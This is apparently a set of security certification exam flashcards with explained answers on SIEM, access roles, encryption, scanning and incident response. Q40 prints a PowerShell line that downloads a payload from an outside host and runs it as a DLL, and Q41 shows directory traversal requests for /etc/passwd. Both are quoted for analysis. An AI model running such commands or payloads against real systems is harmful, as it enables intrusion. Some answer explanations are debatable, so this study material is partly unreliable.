An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

a. Data custodian
b. Data controller
c. Data protection officer
d. Data processor

A

b. Data controller

Here’s why:

Data controller: The data controller is responsible for determining the purposes for which personal data is processed and the means by which it is processed. This role decides why certain data is collected, how it will be used, and the legal basis for its processing. The data controller ensures that processing activities comply with data protection regulations and organizational policies.

In contrast, let’s clarify the other options:

a. Data custodian: The data custodian is responsible for the storage, maintenance, and protection of data according to the policies set by the data controller. They implement and manage the technical aspects of data management, but they do not determine the purposes or methods of data processing.

c. Data protection officer: The Data Protection Officer (DPO) is responsible for overseeing data protection strategy and implementation to ensure compliance with data protection laws and regulations. They advise on data protection impact assessments (DPIAs) and monitor compliance, but they typically do not determine the purpose of data processing.

d. Data processor: The data processor processes personal data on behalf of the data controller, following the controller's instructions. They do not determine the purposes or methods of processing unless instructed by the data controller.

Therefore, b. Data controller is the role within an organization that determines the purpose of data and how to process it, making it essential in data stewardship roles and responsibilities.

29
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

a. Firewall
b. SIEM
c. IPS
d. Protocol analyzer

A

b. SIEM (Security Information and Event Management)

Here’s why SIEM is the most suitable choice:

Centralized monitoring: SIEM solutions aggregate and analyze log data from various sources across the network, including endpoints, firewalls, servers, and other network devices. This allows for comprehensive visibility into network activities, including beaconing activities to malicious domains.

Correlation capabilities: SIEM systems are designed to correlate events and activities across different endpoints and network devices. They can detect patterns and anomalies that indicate coordinated or widespread malicious activities, such as multiple endpoints communicating with the same malicious domain.

Alerting and reporting: SIEMs provide real-time monitoring, alerting, and reporting capabilities, which are crucial for identifying and responding to security incidents promptly. In the case of beaconing activities, SIEM can generate alerts based on predefined rules or anomaly detection algorithms.

In contrast, let’s briefly consider the other options:

a. Firewall: While firewalls provide network security by monitoring and controlling incoming and outgoing traffic, they typically do not have the extensive logging, correlation, and analysis capabilities necessary to track and correlate activities across multiple endpoints.

c. IPS (Intrusion Prevention System): IPS systems focus on identifying and blocking suspicious network traffic and activities. While they can detect some malicious activities, they do not provide the holistic endpoint visibility and correlation capabilities offered by SIEM.

d. Protocol analyzer: Protocol analyzers (or packet analyzers) capture and analyze network traffic at a packet level, which can be useful for deep inspection of network communications. However, they lack the centralized logging and correlation features needed to effectively correlate activities across different endpoints in real-time.

Therefore, b. SIEM is the best technology for correlating activities between different endpoints, especially in the scenario of observing multiple beaconing activities to a malicious domain hosting malware.
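The correlation step a SIEM performs can be illustrated with a small Python sketch (event records and hostnames are hypothetical): group normalized events by destination domain and flag any domain contacted by more than one endpoint, which is the beaconing pattern described in the question.

```python
from collections import defaultdict

# Hypothetical normalized events a SIEM might aggregate from endpoint logs
events = [
    {"host": "pc-01", "domain": "evil.example", "ts": "10:00"},
    {"host": "pc-02", "domain": "evil.example", "ts": "10:10"},
    {"host": "pc-01", "domain": "evil.example", "ts": "10:20"},
    {"host": "pc-03", "domain": "cdn.example",  "ts": "10:05"},
]

# Correlate: which endpoints contacted which domains
by_domain = defaultdict(set)
for e in events:
    by_domain[e["domain"]].add(e["host"])

# Flag domains contacted by multiple endpoints (possible coordinated beaconing)
for domain, hosts in sorted(by_domain.items()):
    if len(hosts) > 1:
        print(domain, sorted(hosts))
```

A production SIEM applies the same idea at scale, with parsing, enrichment, and alerting rules layered on top of this kind of aggregation.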

30
Q

Which of the following types of controls is a turnstile?

a. Physical
b. Detective
c. Corrective
d. Technical

A

The type of control that a turnstile represents is:

a. Physical

Here’s why:

Physical controls are measures implemented physically to protect resources, personnel, and facilities. Turnstiles are physical barriers or access control devices that regulate or restrict entry to a specific area or facility. They physically prevent unauthorized individuals from passing through unless they have the appropriate authorization (e.g., a valid ticket, badge, or access card).

In contrast, let’s briefly define the other types of controls:

Detective controls are designed to detect and identify security incidents or anomalies after they have occurred. Examples include log monitoring, security cameras, and intrusion detection systems (IDS).

Corrective controls are implemented to mitigate the impact of security incidents and restore systems to normal operations. Examples include incident response procedures, backup and recovery plans, and system restoration processes.

Technical controls encompass security measures that are implemented using technology. This includes firewalls, encryption, antivirus software, and authentication mechanisms. (The badge reader attached to a turnstile is a technical control; the turnstile barrier itself is physical.)

Therefore, the correct answer is a. Physical, as turnstiles are physical controls used for access regulation.

31
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

a. nmap
b. tracert
c. ping
d. ssh

A

a. nmap

nmap (Network Mapper) is a versatile network scanning tool that can be used to discover hosts and services on a computer network. In this context, it can help determine if the specific server is reachable from the internal workstation and if specific ports necessary for application access are open or blocked.

Here’s how nmap can assist:

Port scanning: nmap can perform port scans to check which ports on the server are open and accessible from the workstation. If the firewall rule was intended to allow access to specific ports, nmap can verify if these ports are indeed reachable.

Service detection: nmap can identify the services running on the server and their respective ports. This helps in troubleshooting whether the expected application service is accessible and responsive.

In contrast, let’s briefly discuss the other options:

b. tracert (traceroute): Traceroute shows the path that packets take from the source to the destination, displaying each hop along the way. While useful for diagnosing routing issues, it doesn't directly verify if traffic is being blocked by a firewall.

c. ping: Ping checks the basic connectivity between two devices by sending ICMP echo requests and receiving ICMP echo replies. While it confirms basic connectivity (as noted in the question), it doesn't provide information on whether specific ports are being blocked.

d. ssh: Secure Shell (SSH) is a protocol used for securely accessing a remote server. It is not relevant in this context for diagnosing firewall blocking issues.

Therefore, a. nmap is the appropriate tool for the security analyst to use to help identify if the traffic is being blocked by the firewall after the recent rule implementation.
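A quick way to approximate what an nmap connect scan does, useful when nmap is unavailable, is a plain TCP connect test. A minimal Python sketch (the loopback listener is only for demonstration; in practice the analyst would probe the server's application port):

```python
import socket

def port_open(host, port, timeout=2.0):
    """Attempt a TCP connect. A firewall silently dropping traffic
    typically shows up as a timeout; a closed port is refused quickly."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Loopback demo: open a listener, probe it, then close it and probe again
srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
port = srv.getsockname()[1]
print(port_open("127.0.0.1", port))   # True: port reachable
srv.close()
print(port_open("127.0.0.1", port))   # False: connection refused
```

The distinction between a timeout (likely filtered/blocked) and an immediate refusal (reachable but closed) is the same signal nmap reports as "filtered" versus "closed".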

32
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

*The exception process and policy have been correctly followed by the majority of users.
*A small number of users did not create tickets for the requests but were granted access.
*All access had been approved by supervisors.
*Valid requests for the access sporadically occurred across multiple departments.
*Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

(Community : C 65%, A 32%)

c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

Here’s why this option is the most suitable:

Quarterly audits: Regular audits allow the security team to review all user accounts that have been granted exceptions to use USB storage devices. By doing so, they can verify the validity of each exception and ensure that access is still justified based on current needs. This helps in identifying instances where access should be revoked because it is no longer required.

Verification with management: Auditing exceptions with the management team ensures that all access has appropriate supervisory approval and oversight. This step addresses the issue where some users were granted access without following the formal ticketing process but had supervisor approval. It also aligns with audit requirements to maintain proper documentation and oversight of access control decisions.

Let’s briefly review why the other options are less suitable:

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval: While automation can streamline processes, it may not capture nuanced decisions or changes in access needs between monthly intervals, potentially disrupting legitimate access.

b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request: This approach is overly restrictive and could disrupt legitimate business needs, especially for ongoing projects or roles that require USB device usage.

d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices: While a ticketing system is useful for tracking requests, it doesn't directly address the need to periodically review and revoke unnecessary access that was previously granted.

Therefore, c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team is the most effective strategy to ensure appropriate access control without disrupting legitimate operations while also addressing the issue of unneeded access not being removed promptly.
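The quarterly audit logic can be sketched in a few lines of Python (user names, dates, and the 90-day window are illustrative assumptions): flag any exception whose last management verification is older than a quarter, without touching access that was recently re-verified.

```python
from datetime import date, timedelta

REVIEW_WINDOW = timedelta(days=90)   # roughly one quarter

# Hypothetical exception records: (user, date last verified with management)
exceptions = [
    ("alice", date(2024, 1, 10)),
    ("bob",   date(2024, 4, 2)),
    ("carol", date(2023, 11, 5)),
]

def needs_review(last_verified, today):
    # Flag exceptions not re-verified within the review window
    return today - last_verified > REVIEW_WINDOW

today = date(2024, 4, 15)
stale = [user for user, verified in exceptions if needs_review(verified, today)]
print(stale)   # ['alice', 'carol']
```

Only the stale entries go to the management team for verification, so valid, recently confirmed access (bob) is never disrupted.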

33
Q

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

a. Asymmetric
b. Symmetric
c. Homomorphic
d. Ephemeral

A

c. Homomorphic encryption

Here’s why:

Homomorphic encryption allows computations to be performed on encrypted data without decrypting it first. This means that authorized parties can perform operations (such as addition, multiplication, etc.) on the encrypted data, obtain results in encrypted form, and then decrypt the results to obtain the same outcome as if the operations had been performed on the plaintext data.

For a financial institution storing sensitive customer data in the cloud, homomorphic encryption ensures that the data remains encrypted at all times, even during processing and manipulation. This prevents the cloud service provider (CSP) or any unauthorized parties from accessing or deciphering the sensitive data, thus preserving confidentiality.

Homomorphic encryption is computationally intensive and introduces significant latency, but the scenario explicitly states that computational overhead and slow speeds are not a concern for the financial institution.

In contrast, let’s briefly review the other options:

a. Asymmetric encryption: In asymmetric encryption, different keys are used for encryption and decryption. It's not typically used for computations on encrypted data but rather for secure communication and digital signatures.

b. Symmetric encryption: Symmetric encryption uses the same key for both encryption and decryption. While efficient for data storage and transmission, it doesn't support computation on encrypted data as required in the scenario.

d. Ephemeral encryption: Ephemeral encryption refers to short-lived keys used for encryption and is not directly related to the ability to perform computations on encrypted data.

Therefore, c. Homomorphic encryption is the most appropriate cryptographic technique to allow the financial institution to store and manipulate customer data in the cloud while maintaining strong security through encryption.
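The core idea can be demonstrated with textbook RSA, which happens to be multiplicatively homomorphic: multiplying two ciphertexts yields a ciphertext of the product. This is a toy illustration with tiny parameters, not the schemes (e.g., Paillier, BFV/CKKS) a real deployment would use:

```python
# Textbook RSA satisfies E(a) * E(b) mod n = E(a * b mod n), so a party
# holding only ciphertexts can compute on the data without decrypting it.
p, q, e = 61, 53, 17
n = p * q                            # 3233
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent (Python 3.8+)

enc = lambda m: pow(m, e, n)
dec = lambda c: pow(c, d, n)

a, b = 12, 7
product_ct = (enc(a) * enc(b)) % n   # cloud multiplies ciphertexts only
print(dec(product_ct))               # 84 == a * b, inputs never decrypted
```

Fully homomorphic schemes extend this to both addition and multiplication, which is what allows arbitrary computation on encrypted customer records in the cloud.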

34
Q

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

a. a rootkit.
b. a PUP.
c. a backdoor.
d. ransomware.
e. a RAT.

A

b. a PUP (Potentially Unwanted Program)

Here’s why:

Potentially Unwanted Program (PUP): Antivirus applications often flag software as PUPs if they exhibit behaviors or characteristics that are not inherently malicious but may be undesirable or unwanted. Cryptomining software, while not necessarily harmful in intent, can consume significant system resources (CPU, GPU) and may exhibit behavior patterns (like high resource usage) that antivirus software flags as potentially unwanted.

Constant issues reported after antivirus deployment: The problems appeared only once the antivirus was rolled out to the servers, the systems actually running the mining software, which suggests the antivirus was flagging or quarantining the miner as potentially unwanted rather than malfunctioning on its own.

In contrast, let’s briefly review the other options:

a. a rootkit: Rootkits are malicious software designed to gain unauthorized access and hide the presence of other malicious software or activities. Cryptomining software, while intrusive in resource usage, typically does not operate as a rootkit.

c. a backdoor: A backdoor is a type of malicious software that provides unauthorized access to a system. Cryptomining software, if not maliciously intended, would not function as a backdoor.

d. ransomware: Ransomware encrypts data and demands payment for decryption. Cryptomining software is unrelated to ransomware behavior.

e. a RAT (Remote Access Trojan): RATs are malicious programs that allow remote control of a compromised system. Cryptomining software does not fall into this category unless modified maliciously.

Therefore, b. a PUP (Potentially Unwanted Program) is the most likely classification that the antivirus application applied to the mining software, leading to the reported issues and the decision to remove the mining software from the servers.

35
Q

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

a. # iptables -t mangle -X
b. # iptables -F
c. # iptables -Z
d. # iptables -P INPUT -j DROP

A

When faced with a situation where iptables rules are causing the network to become unresponsive by dropping all connections, the BEST option to remove those rules and restore normal network functionality is:

b. # iptables -F

Explanation:

iptables -F: This command flushes (deletes) all rules from every chain in the selected table (by default the filter table, which contains the INPUT, OUTPUT, and FORWARD chains). Flushing removes the rules that are dropping connections. Note that if a chain's default policy was also set to DROP, the administrator must additionally reset it (e.g., # iptables -P INPUT ACCEPT), since -F clears rules but leaves default policies untouched.

Let’s briefly review the other options for clarity:

a. # iptables -t mangle -X: This command deletes all the non-builtin chains in the mangle table. It's useful for removing user-defined chains in the mangle table, but it does not remove rules from the filter table which is typically used for network filtering.

c. # iptables -Z: This command resets the packet and byte counters in all chains. It does not remove rules; it just clears the counters.

d. # iptables -P INPUT -j DROP: This command sets the default policy for the INPUT chain to DROP, which means all incoming packets are dropped unless explicitly allowed by rules. This doesn't remove rules but changes the default action for incoming packets.

Therefore, b. # iptables -F is the correct and most appropriate option to remove all rules and restore normal network connectivity when iptables rules are causing the network to become unresponsive.

36
Q

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

a. Document the collection and require a sign-off when possession changes.
b. Lock the device in a safe or other secure location to prevent theft or alteration.
c. Place the device in a Faraday cage to prevent corruption of the data.
d. Record the collection in a blockchain-protected public ledger.

A

a. Document the collection and require a sign-off when possession changes.

Here’s why this option is correct:

Documenting the collection: This involves recording details such as the date, time, location, condition of the device, and the person who collected it. Documenting ensures a clear record of when and how the device was collected, which is essential for maintaining the chain of custody.

Sign-off when possession changes: Requiring a sign-off ensures accountability and documentation of who has possession of the device at any given time. This helps prevent unauthorized access or tampering with the device during the investigation process.

In contrast, let’s briefly review why the other options are less appropriate:

b. Lock the device in a safe or other secure location to prevent theft or alteration: While securing the device is important, chain of custody involves documenting every instance of possession change and maintaining a record, not just securing the physical location.

c. Place the device in a Faraday cage to prevent corruption of the data: Faraday cages are used to block electromagnetic signals, which is typically done to prevent remote wiping or alteration of data, but it does not address the documentation and accountability aspects of chain of custody.

d. Record the collection in a blockchain-protected public ledger: While blockchain technology can provide immutable records, it is not commonly used for everyday chain of custody purposes in incident response. Documentation and sign-offs are more practical and widely accepted methods.

Therefore, a. Document the collection and require a sign-off when possession changes is the best practice for maintaining chain of custody when collecting a mobile device during an investigation.

37
Q

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

a. The vendor firmware lacks support.
b. Zero-day vulnerabilities are being discovered.
c. Third-party applications are not being patched.
d. Code development is being outsourced.

A

c. Third-party applications are not being patched.

Here’s why this option is likely:

Third-party applications: While the company may have implemented a patch management policy for its own operating systems and software, third-party applications (such as software from other vendors or providers) often require separate patching processes. These applications can include plugins, libraries, middleware, and other software components that are critical but not directly controlled by the company's internal patch management policy.

Vulnerability scanners: These scanners detect vulnerabilities not only in the company's core operating systems and applications but also in third-party software. If third-party applications are not included in the patch management process or if patches are not applied promptly, vulnerability scanners will continue to flag these hosts as vulnerable.

Let’s briefly review the other options for clarity:

a. The vendor firmware lacks support: While outdated vendor firmware can be a vulnerability issue, it typically affects specific hardware components and is less likely to be the sole reason for vulnerability scanner flags across multiple hosts.

b. Zero-day vulnerabilities are being discovered: Zero-day vulnerabilities are newly discovered flaws for which no patch yet exists. They are a less likely explanation here, because scanners repeatedly flagging hosts right after a completed patch cycle typically points to known, patchable vulnerabilities that were simply missed, such as those in unpatched third-party software.

d. Code development is being outsourced: Outsourced code development can introduce security risks, but it's not directly related to the ongoing vulnerability scanner flags unless specific vulnerabilities are introduced due to insecure coding practices.

Therefore, c. Third-party applications are not being patched is the most likely cause of the vulnerability scanner flags continuing after the patch management process. Addressing third-party application patching alongside internal systems can help mitigate these ongoing vulnerabilities.

38
Q

Which of the following controls would provide the BEST protection against tailgating?

a. Access control vestibule
b. Closed-circuit television
c. Proximity card reader
d. Faraday cage

A

a. Access control vestibule

Here’s why:

Access control vestibule: Also known as a mantrap or airlock, an access control vestibule is designed to allow only one person to pass through at a time. It typically consists of two sets of interlocking doors. The first set of doors must close and lock before the second set of doors can open, ensuring that only one person can enter or exit at a time. This effectively prevents unauthorized individuals from following closely behind an authorized person (tailgating) without proper authentication.

In contrast, let’s briefly review the other options:

b. Closed-circuit television (CCTV): CCTV provides video surveillance but does not physically prevent tailgating. It can be used to monitor and record incidents of tailgating but does not directly stop unauthorized access.

c. Proximity card reader: While proximity card readers authenticate individuals based on their proximity cards, they do not prevent tailgating by themselves. Tailgating can occur if an unauthorized person closely follows an authorized person through the door before it closes.

d. Faraday cage: A Faraday cage is designed to block electromagnetic signals and is used primarily for preventing electronic eavesdropping or interference. It is not relevant for physical access control against tailgating.

Therefore, a. Access control vestibule is the best control among the options listed to effectively prevent tailgating by enforcing a single-person entry and exit process through secured doors.

39
Q

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

a. Privilege escalation
b. Memory leak
c. Directory traversal
d. Race condition

A

a. Privilege escalation

Here’s why:

Cron job as root: The cron job is configured to execute a script (update.sh) located in a writable directory (/writable/) as the root user. This setup indicates that the script runs with elevated privileges, potentially allowing the penetration tester to execute commands as root.

Objective: By identifying the cron job and its configuration, the penetration tester can now focus on exploiting potential vulnerabilities within the /writable/update.sh script or the writable directory itself to escalate privileges and gain root access.

Let’s briefly review the other options for clarity:

b. Memory leak: A memory leak refers to a situation where a program fails to release memory it has allocated but no longer needs. It is unrelated to the observed cron job configuration.

c. Directory traversal: Directory traversal involves exploiting insufficient security validation in file path inputs to access files outside of the intended directory. It is not directly relevant to the cron job scenario described.

d. Race condition: A race condition occurs when two or more operations are performed concurrently, leading to unexpected outcomes due to the sequence of execution. While it can be a security issue, it is not directly applicable to the cron job observation scenario.

Therefore, a. Privilege escalation is the next logical action for the penetration tester after identifying the root-executed cron job, aiming to exploit it to gain escalated privileges on the Linux server.
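As an illustration of the first check a tester would perform, here is a minimal Python sketch that simulates the finding in a scratch directory (the paths are stand-ins for illustration, not the real /writable/update.sh):

```python
import os
import stat
import tempfile

# Simulate the finding in a scratch directory (hypothetical stand-in paths).
workdir = tempfile.mkdtemp()
script = os.path.join(workdir, "update.sh")
with open(script, "w") as f:
    f.write("#!/bin/sh\n")          # stands in for the root-run cron script
os.chmod(script, 0o777)             # world-writable, like /writable/update.sh

# The tester's first question: can the current (unprivileged) user modify
# a script that cron executes as root?
mode = os.stat(script).st_mode
world_writable = bool(mode & stat.S_IWOTH)
print("escalation candidate" if world_writable else "not writable")
```

If the check succeeds on a real target, appending a command to the script would have it executed as root on the next cron tick, which is the privilege escalation the answer refers to.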

40
Q

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

a. A PowerShell code is performing a DLL injection.
b. A PowerShell code is displaying a picture.
c. A PowerShell code is configuring environmental variables.
d. A PowerShell code is changing Windows Update settings.

A

a. A PowerShell code is performing a DLL injection.

Here’s why this option is the best description:

Script Analysis:
    The script invokes PowerShell (powershell.exe) to download a file (04EB18.jpg) from the specified URI (https://somehost.com/); the -URI and -OutFile parameters are those of a download cmdlet such as Invoke-WebRequest, which appears to have been elided from the quoted command.
    It saves the downloaded file as autoupdate.dll in the temporary directory ($env:TEMP).
    After downloading, it executes (Start-Process) rundl132.exe (apparently a typo or lookalike for rundll32.exe, the legitimate Windows executable used to run code exported from DLLs) with autoupdate.dll as the argument.

DLL Injection: The script's behavior of downloading a file (autoupdate.dll) and then executing it with rundll32.exe is a typical method of running malicious DLL code under the cover of a legitimate Windows process, potentially compromising system integrity and security. (Strictly speaking, launching a DLL via rundll32 is often classified as DLL proxy execution rather than classic injection into another process's memory, but among the options given, DLL injection is the intended answer.)

In contrast, let’s briefly review the other options:

b. A PowerShell code is displaying a picture: While the script mentions downloading a file (04EB18.jpg), it's actually saving it as a DLL (autoupdate.dll) and executing it, not displaying it as an image.

c. A PowerShell code is configuring environmental variables: The script uses $env:TEMP to specify the temporary directory for saving the downloaded file, but it's not primarily focused on configuring environmental variables.

d. A PowerShell code is changing Windows Update settings: There is no indication in the script that it is modifying Windows Update settings. Instead, it is downloading and executing a potentially malicious DLL.

Therefore, a. A PowerShell code is performing a DLL injection accurately describes the actions and intent of the PowerShell script as observed by the security analyst.
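As a toy illustration (not a production detection rule), an analyst could flag command lines that combine a download to $env:TEMP with a rundll32-style execution. The indicator strings below are assumptions chosen for this one sample:

```python
# The command line recovered from the .lnk file (as quoted in the question).
cmdline = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
           r"-URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;"
           r"Start-Process rundl132.exe $env:TEMP\autoupdate.dll")

# Toy indicators: a download written to the temp directory plus a
# rundll32 lookalike ("rundl" also matches the typo "rundl132").
indicators = ["-outfile", "$env:temp", "rundl"]
suspicious = all(tok in cmdline.lower() for tok in indicators)
print("suspicious" if suspicious else "clean")
```

A real detection would use process telemetry and proper parsing rather than substring matching; the sketch only shows why this combination of behaviors stands out.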

41
Q

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
GET index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Which of the following BEST describes this kind of attack?

a. Directory traversal
b. SQL injection
c. API
d. Request forgery

A

a. Directory traversal

Here’s why this option is the best description:

Directory traversal: This attack attempts to access files or directories outside the web server's root directory by using relative path traversal sequences (../). In the provided URLs, the sequence ..%2f is the URL-encoded form of ../ (%2f encodes the / character), and each occurrence moves one directory level up on a Unix-based system.

Attack Pattern: The repeated ..%2f sequences in the page parameter show the attacker stepping up through an increasing number of directory levels (nine, ten, then eleven) in an attempt to escape the web root and read /etc/passwd, a sensitive system file that is not intended to be accessible through the web application.

In contrast, let’s briefly review the other options for clarity:

b. SQL injection: SQL injection involves manipulating SQL queries through input data, typically through forms or parameters, to execute unauthorized SQL commands. The provided URLs do not show typical SQL injection patterns.

c. API: APIs (Application Programming Interfaces) allow applications to communicate and interact with each other. The attack described does not involve API-related activities.

d. Request forgery: Request forgery involves tricking a user into performing actions without their knowledge or consent, often through maliciously crafted requests. This is not evident from the provided output, which focuses on repeated directory traversal attempts.

Therefore, a. Directory traversal is the best description of the attack based on the provided information, where the attacker is trying to navigate through directories beyond the web server’s intended access boundaries.
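The decoding described above can be reproduced with Python's standard library (the payload string mirrors the first request in the question):

```python
from urllib.parse import unquote

# The page parameter from the first captured request:
# nine "..%2f" hops followed by the encoded target path.
payload = "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
decoded = unquote(payload)          # %2f decodes to '/'
print(decoded)                      # -> '../' * 9 + 'etc/passwd'
```

The decoded value is exactly the kind of relative path a vulnerable include on index.php would resolve against the filesystem.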

42
Q

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

a. Data protection officer
b. Data owner
c. Backup administrator
d. Data custodian
e. Internal auditor

A

d. Data custodian

Here’s why:

Data custodian: A data custodian is responsible for the storage, maintenance, and protection of data assets within an organization. This role involves implementing technical controls, such as backup procedures and data encryption, to ensure data integrity, availability, and confidentiality. Ensuring backups are properly maintained falls directly within the purview of a data custodian's responsibilities.

In contrast, let’s briefly review the other options for clarity:

a. Data protection officer: The Data Protection Officer (DPO) is typically responsible for overseeing an organization's data protection strategy and ensuring compliance with data protection regulations such as GDPR. While they have oversight, they may not directly implement technical controls like backups.

b. Data owner: The data owner is responsible for the governance of specific data elements, making decisions regarding access, usage, and overall data strategy. They are typically not involved in technical implementation such as backup management.

c. Backup administrator: While responsible for backups, a backup administrator's role is more focused on the operational aspects of backup systems and schedules rather than broader data protection and technical control implementation.

e. Internal auditor: Internal auditors review and assess an organization's processes and controls for compliance and efficiency but do not typically have responsibility for implementing day-to-day technical controls like data backups.

Therefore, d. Data custodian is the role that would typically encompass responsibilities for implementing technical controls to protect data and ensuring proper maintenance of backups within an organization.

43
Q

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

a. White team
b. Purple team
c. Green team
d. Blue team
e. Red team

A

a. White team

▪ Red Team - The hostile or attacking team in a penetration test or incident response exercise
▪ Blue Team - The defensive team in a penetration test or incident response exercise
▪ White Team - The staff administering, evaluating, and supervising a penetration test or incident response exercise; in other words, the referees

44
Q

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

a. Vulnerabilities with a CVSS score greater than 6.9.
b. Critical infrastructure vulnerabilities on non-IP protocols.
c. CVEs related to non-Microsoft systems such as printers and switches.
d. Missing patches for third-party software on Windows workstations and servers.

A

d. Missing patches for third-party software on Windows workstations and servers.

Here’s why:

Credentialed vs. uncredentialed scans: Credentialed scans have access to the credentials (such as usernames and passwords) of the systems being scanned. This allows the scanning tool to perform a more thorough inspection of the system, including checking for missing patches and updates on both operating system components and third-party software applications installed on the systems.

Missing patches for third-party software: Uncredentialed scans typically only check the network-facing services and ports, identifying vulnerabilities based on responses to network probes. They may miss vulnerabilities related to third-party software applications installed on the systems because they do not have the necessary access to inspect these applications and their patch levels.

In contrast, let’s briefly review the other options for clarity:

a. Vulnerabilities with a CVSS score greater than 6.9: Both credentialed and uncredentialed scans can detect vulnerabilities based on their CVSS scores, regardless of whether they exceed a specific threshold. However, the ability to detect specific missing patches for third-party software is more dependent on the credentials used in the scan.

b. Critical infrastructure vulnerabilities on non-IP protocols: Vulnerability scanners operate over IP networks, so non-IP protocols are largely out of reach for both credentialed and uncredentialed scans; supplying credentials does not change this.

c. CVEs related to non-Microsoft systems such as printers and switches: Credentialed scans can detect CVEs (Common Vulnerabilities and Exposures) related to non-Microsoft systems if those systems are included in the scan scope and credentials are provided. However, the focus of this question is more on the detection of missing patches for third-party software.

Therefore, d. Missing patches for third-party software on Windows workstations and servers is the most likely scenario where a credentialed scan would provide more comprehensive results compared to an uncredentialed scan.

45
Q

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

a. MAC filtering
b. Anti-malware
c. Translation gateway
d. VPN

A

d. VPN (Virtual Private Network)

Here’s why:

VPN: A VPN allows remote users or devices to securely connect to the internal network over the internet. It establishes an encrypted tunnel between the user's device and the internal network, ensuring that data transmitted over the internet is secure and private. VPNs typically require authentication, such as username/password or certificate-based authentication, ensuring that only authorized users or devices can access the internal network.

In contrast, let’s briefly review the other options for clarity:

a. MAC filtering: MAC filtering involves allowing or denying network access based on the MAC (Media Access Control) address of a device. While it can restrict access to some extent, MAC addresses can be spoofed, and it does not provide robust security against determined attackers or unauthorized users.

b. Anti-malware: Anti-malware software protects devices from malicious software such as viruses, trojans, and worms. While important for endpoint security, it does not directly prevent unauthorized access to the internal network.

c. Translation gateway: A translation gateway (for example, a NAT gateway) translates addresses between networks. While NAT hides internal addresses from the outside, it is not an authentication or access-control mechanism and does not, by itself, prevent unauthorized access the way an authenticated VPN does.

Therefore, d. VPN is the most appropriate solution for ensuring secure and authenticated remote access to the internal network, preventing unauthorized access effectively.

46
Q

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

a. The DNS logs
b. The web server logs
c. The SIP traffic logs
d. The SNMP logs

A

a. The DNS logs

DNS logs can show the domain names that Joe’s computer resolved during his browsing session. This can help identify any suspicious or malicious domains that were accessed, which could have been the source of the malware.

Here’s why the other options are less relevant in this context:

The web server logs: These logs reside on the external web servers Joe visited, so they are not available to the organization's analysts. The organization's own web server logs would only record visits to its own sites, not Joe's general internet browsing.

The SIP traffic logs: SIP (Session Initiation Protocol) traffic logs are related to VoIP (Voice over IP) and are not relevant to web browsing activity.

The SNMP logs: SNMP (Simple Network Management Protocol) logs are used for network management and monitoring and do not provide information about web browsing activity.

Therefore, the DNS logs would most likely show where the malware originated by identifying the domains Joe’s computer accessed while browsing the internet.
